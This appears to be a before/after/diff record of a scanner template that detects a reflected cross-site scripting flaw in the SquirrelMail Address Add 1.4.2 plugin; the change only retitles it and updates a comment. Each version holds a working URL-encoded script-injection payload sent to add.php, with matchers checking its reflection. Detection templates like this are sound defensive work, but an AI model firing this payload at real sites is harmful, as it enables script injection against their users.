vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml (before)
id: squirrelmail-address-xss

info:
  name: SquirrelMail 1.4.2 Address Add - Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  description: SquirrelMail Address Add 1.4.2 plugin contains a cross-site scripting vulnerability. It fails to properly sanitize user-supplied input, thus allowing an attacker to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://www.exploit-db.com/exploits/26305
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: edb,xss,squirrelmail,plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - "text/html"

# Enhanced by md on 2022/09/22

vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml (after)
id: squirrelmail-address-xss

info:
  name: SquirrelMail Address Add 1.4.2 - Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  description: SquirrelMail Address Add 1.4.2 plugin contains a cross-site scripting vulnerability. It fails to properly sanitize user-supplied input, thus allowing an attacker to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://www.exploit-db.com/exploits/26305
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: edb,xss,squirrelmail,plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - "text/html"

# Enhanced by mp on 2022/09/23

vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml (diff)
@@ -1,7 +1,7 @@
 id: squirrelmail-address-xss
 
 info:
-  name: SquirrelMail 1.4.2 Address Add - Cross-Site Scripting
+  name: SquirrelMail Address Add 1.4.2 - Cross-Site Scripting
   author: dhiyaneshDk
   severity: medium
   description: SquirrelMail Address Add 1.4.2 plugin contains a cross-site scripting vulnerability. It fails to properly sanitize user-supplied input, thus allowing an attacker to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
@@ -34,4 +34,4 @@ requests:
         words:
           - "text/html"
 
-# Enhanced by md on 2022/09/22
+# Enhanced by mp on 2022/09/23
